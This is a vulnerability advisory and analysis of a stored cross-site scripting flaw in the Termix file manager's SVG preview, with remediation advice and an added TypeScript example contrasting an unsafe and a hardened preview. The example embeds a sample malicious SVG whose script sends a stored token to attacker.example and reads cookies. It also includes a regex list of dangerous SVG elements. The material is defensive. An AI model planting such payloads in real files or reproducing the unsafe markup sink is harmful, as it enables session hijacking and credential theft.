CVE-2026-22804 in Termix

Summary

by MITRE • 01/13/2026

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. In versions 1.7.0 through 1.9.0, a stored cross-site scripting (XSS) vulnerability exists in the Termix File Manager component: the application does not sanitize SVG file content before rendering it. An attacker who has compromised a managed SSH server can plant a malicious SVG file which, when previewed by a Termix user, executes arbitrary JavaScript in the context of the application. The vulnerable code is in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. The issue is fixed in 1.10.0.


Analysis

by VulDB Data Team • 01/17/2026

CVE-2026-22804 is a stored cross-site scripting flaw in Termix versions 1.7.0 through 1.9.0, specifically in the File Manager component that renders SVG files. The File Manager takes the bytes of a file read from a managed host and renders them as SVG markup without validating or escaping the content, so any script, event handler, or javascript: link inside the file is executed by the browser. Because the payload lives in a file on the managed host, the risk is persistent: it does not require any interaction with Termix's own upload or write paths, only that the file exists where a Termix user may preview it.

Exploitation starts from an SSH server that Termix manages. An attacker who controls that server (or can write files on it) places an SVG file containing embedded JavaScript, for example a script element, an onload attribute on the root svg element, or an anchor with a javascript: URI. When a Termix user opens or previews that file in the web interface, the SVG is rendered in the Termix origin and the embedded script runs with the victim's session. The trust boundary that is crossed is the assumption that content read from a managed host is safe to turn into application UI; Termix's own authentication is not a barrier, since the attacker never authenticates to Termix at all.

The sink is the FileViewer.tsx component in src/ui/desktop/apps/file-manager, which is the primary interface for displaying file content in the Termix desktop UI. Because the component renders SVG content as markup rather than as an inert image, the XSS is stored and fires every time a user previews the planted file. Any Termix user who can browse the compromised host is affected, and in a management tool the impact of script execution in the application origin is broad: session hijacking, theft of stored SSH credentials or host configuration, and actions taken through the Termix interface with the victim's privileges. In practice this means the compromise of one managed host can be turned into access to every host the victim manages from Termix.

This vulnerability maps to CWE-79 (Improper Neutralization of Input During Web Page Generation), the weakness in which an application includes untrusted data in a web page without proper validation or escaping, allowing attackers to inject scripts. Note that ATT&CK technique T1566 is Phishing and does not describe this flaw; the closest ATT&CK match for the browser-side execution is T1059.007 (Command and Scripting Interpreter: JavaScript). Exploitation requires the attacker to first obtain write access on a managed SSH server, making this a multi-stage attack that combines a host compromise with application-level exploitation of the operator's browser.

The remediation is to upgrade to Termix 1.10.0, which sanitizes SVG content before rendering. Independently of the vendor fix, the general rule for any file-preview feature is that file content from a managed host is untrusted input: never render it as markup (innerHTML or dangerouslySetInnerHTML), but show SVG through an img element or a sandboxed iframe, where browsers do not execute script, or run it through a maintained sanitizer such as DOMPurify with its SVG profile before it touches the DOM. Raw file downloads should be served with Content-Disposition: attachment and X-Content-Type-Options: nosniff so a browser does not render them in the application origin, and a Content Security Policy that disallows inline script limits the damage if a sink is missed. Detection should focus on the managed hosts rather than on Termix uploads, since the attacker writes the file directly on the server: file integrity monitoring for unexpected SVG or HTML files in directories operators browse, and review of sessions and stored credentials if a user is known to have previewed a suspicious file.
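The following TypeScript is an added example and is not Termix's code (the page does not show FileViewer.tsx itself). It models the two preview paths described above: the unsafe one, where the bytes read from a managed host become DOM in the application origin, and a hardened one, where the same bytes are handed to an img element and additionally scanned so the UI can warn that the file contains active content. The element and attribute lists, the attacker.example host, the localStorage key name, and both sample SVG files are constructed for the example; a real implementation should use a maintained sanitizer rather than these regexes.

```typescript
// Added example (not Termix code). Runs under Node/ts-node with no DOM;
// each "preview" is a descriptor of what the UI would render.

interface Finding {
  kind: 'element' | 'event-handler' | 'uri';
  detail: string;
}

type Preview =
  | { kind: 'inline-html'; html: string }                     // unsafe: file bytes become DOM
  | { kind: 'img'; src: string; warnings: Finding[] };        // hardened: rendered as an image

// Collect every match of a global regex without relying on String.prototype.matchAll.
function scan(re: RegExp, src: string): RegExpExecArray[] {
  const out: RegExpExecArray[] = [];
  let m: RegExpExecArray | null;
  while ((m = re.exec(src)) !== null) out.push(m);
  return out;
}

// Conservative scan for content that executes script or loads remote resources
// once the SVG is parsed as markup. Regexes are used only to make the sink
// visible; production code should use DOMPurify or equivalent.
function findActiveSvgContent(svg: string): Finding[] {
  const findings: Finding[] = [];

  // Elements that run script, embed HTML, or animate attributes (SMIL animate/set
  // can point href at a javascript: URI).
  for (const m of scan(/<\s*(script|foreignObject|iframe|embed|object|set|animate)\b/gi, svg))
    findings.push({ kind: 'element', detail: m[1].toLowerCase() });

  // Event handler attributes: onload=, onclick=, onbegin=, ...
  for (const m of scan(/\s(on[a-z]+)\s*=/gi, svg))
    findings.push({ kind: 'event-handler', detail: m[1].toLowerCase() });

  // href / xlink:href / src pointing at javascript:, data: or a remote origin.
  for (const m of scan(/\s(?:xlink:)?(href|src)\s*=\s*["']\s*(javascript:|data:|https?:|\/\/)/gi, svg))
    findings.push({ kind: 'uri', detail: m[1].toLowerCase() + '=' + m[2].toLowerCase() });

  return findings;
}

// Unsafe shape, equivalent to innerHTML / dangerouslySetInnerHTML: whatever the
// managed host returned is parsed as DOM in the application origin, so <script>,
// onload= and javascript: links all run with the victim's session.
function vulnerablePreview(svg: string): Preview {
  return { kind: 'inline-html', html: svg };
}

// Percent-encoded data URL suitable for <img src>; avoids Buffer/btoa so it runs anywhere.
function toSvgDataUrl(svg: string): string {
  return 'data:image/svg+xml;charset=utf-8,' + encodeURIComponent(svg);
}

// Hardened shape: hand the bytes to an <img>. Browsers render SVG in an image
// context with scripting disabled and no external loads, so the same file draws
// but cannot run. Findings are returned so the UI can show a warning banner.
function hardenedPreview(svg: string): Preview {
  return { kind: 'img', src: toSvgDataUrl(svg), warnings: findActiveSvgContent(svg) };
}

// Constructed sample of the kind of file an attacker on a compromised host would
// plant. The exfiltration host and the "token" key are placeholders.
const MALICIOUS_SVG = [
  '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">',
  '  <script>fetch("https://attacker.example/?t=" + localStorage.getItem("token"))</script>',
  '  <a href="javascript:alert(1)"><text y="20">click</text></a>',
  '</svg>',
].join('\n');

// Constructed benign file for comparison.
const BENIGN_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="red"/></svg>';

console.log(vulnerablePreview(MALICIOUS_SVG));   // markup with the script intact: the XSS sink
console.log(hardenedPreview(MALICIOUS_SVG));     // img data URL plus three warnings
console.log(hardenedPreview(BENIGN_SVG));        // img data URL, no warnings
```

The design choice worth noting is that the hardened path does not block files with active content; it renders them in a context where the content is inert and reports what it found. That keeps legitimate SVGs viewable while giving the operator a signal that a file on the managed host is not what it claims to be.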

Responsible: GitHub M
Reservation: 01/09/2026
Disclosure: 01/13/2026
Moderation: accepted
CPE: ready
EPSS: 0.00071
KEV: no
Activities: very low
